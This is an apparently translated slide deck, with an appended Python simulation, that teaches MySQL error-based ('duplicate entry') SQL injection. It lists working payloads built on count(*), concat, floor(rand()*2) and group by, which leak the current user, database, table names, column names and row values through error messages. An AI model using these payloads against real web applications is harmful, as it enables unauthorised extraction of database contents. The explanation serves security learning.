
SQL injection duplicate error principle


  1. A brief analysis of how SQL injection statements work. Vance@hst.tw
  2. I am nobody ● Vance Lin ● A PHP programmer ● Interested in web security ● Hackstuff member
  3. Since time is limited, let me first tell you a story.
  4. OK, the story goes like this.
  5. At this point... Xiao Ming, being a beginner, had no choice but to give up...
  6. But you came here today; how could you give up the same way Xiao Ming did?
  7. OK, the story is over. Those who want to sleep can start now; everything that follows is principles, and it's boring.
  8. Buddha's Palm, form 101: select count(*), concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a
  9. You may never have studied Buddha's Palm, so these may be unfamiliar... 1. concat 2. floor 3. rand 4. group by
  10. Concat
  11. Floor
  12. Rand
  13. Group by
  14. Let's break it down: select count(*), concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a
      ● select user(); returns the username of the current database connection
        ○ so whatever you want to know, put it here, e.g. database(), version()
      ● rand() * 2; gives a number that is either less than 1 or greater than 1
      ● floor(rand() * 2) yields 0 or 1
      ● concat() joins the preceding pieces together
      ● from information_schema.tables has plenty of rows, which makes sure a duplicate actually occurs
      ● select count(*): adding this creates the chance of a duplicate group_key
  15. Result: what appears when it fails
  16. Result: what appears when it succeeds
  17. Applicable situation: as Xiao Ming already told you, it's when UNION SELECT cannot be used, so we switch to a different syntax (posture) and try again.
  18. Advanced usage
      ● Query the database
        ○ select count(*), concat('~',(select database()),'~', floor(rand()*2)) as a from information_schema.tables group by a
      ● Query a table name
        ○ select count(*),concat((select (select (SELECT distinct concat('~', table_name,'~') FROM information_schema.tables Where table_schema='db_name' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a
  19. Advanced usage
      ● Query a column name
        ○ select count(*),concat((select (select (SELECT distinct concat('~', column_name,'~') FROM information_schema.columns Where table_schema='db_name' LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a
      ● Query a row
        ○ select count(*),concat((select(select concat(concat('~', column_name,'~'))) from db_name.table_name limit 1,1),floor(rand(0) *2)) as a from information_schema.tables group by a
  20. Demo + Q&A
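The deck breaks the query into its parts (slide 14) but does not show why the duplicate key appears. The simulation below is an added educational example, not part of the original slides: it emulates the way MySQL's GROUP BY evaluates the group expression once to probe its temporary table and a second time when inserting a new row, so a key built on rand() can collide with a row that is already there. The key sequence is constructed to follow the commonly cited output of floor(rand(0)*2) (0, 1, 1, 0, 1, 1, ...), and the leaked value "root@localhost" is a made-up sample.

```python
"""Simulate MySQL's GROUP BY double evaluation of a non-deterministic key."""
from typing import Callable, Iterator


class DuplicateEntry(Exception):
    """Mirrors MySQL error 1062: Duplicate entry '...' for key 'group_key'."""


def group_by_count(rows: int, key_fn: Callable[[], str]) -> dict:
    """Emulate `select count(*) ... group by a` using a temporary table.

    For each source row the group expression is evaluated to probe the
    temp table. If the key is absent it is evaluated AGAIN for the row
    being inserted; with rand() in the key the two values can differ,
    so the insert may land on a key that already exists.
    """
    temp_table: dict = {}
    for _ in range(rows):
        probe = key_fn()
        if probe in temp_table:
            temp_table[probe] += 1
            continue
        insert = key_fn()  # second evaluation for the new temp-table row
        if insert in temp_table:
            raise DuplicateEntry(f"Duplicate entry '{insert}' for key 'group_key'")
        temp_table[insert] = 1
    return temp_table


def rand0_floor_sequence() -> Iterator[int]:
    # Constructed: the commonly cited first values of floor(rand(0)*2).
    yield from [0, 1, 1, 0, 1, 1, 1, 0, 0, 1]


def make_payload_key(leak: str, bits: Iterator[int]) -> Callable[[], str]:
    """Build concat('~', <leak>, '~', floor(rand(0)*2)) as a key function."""
    return lambda: f"~{leak}~{next(bits)}"


def run(rows: int, leak: str = "root@localhost") -> str:
    """Return the error text the database would raise, or 'no error'."""
    try:
        group_by_count(rows, make_payload_key(leak, rand0_floor_sequence()))
    except DuplicateEntry as exc:
        return str(exc)
    return "no error"
```

With the rand(0) sequence the collision happens on the third row, which is why the table scanned must hold at least three rows, and the only thing that carries the leaked value is the database error string itself.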
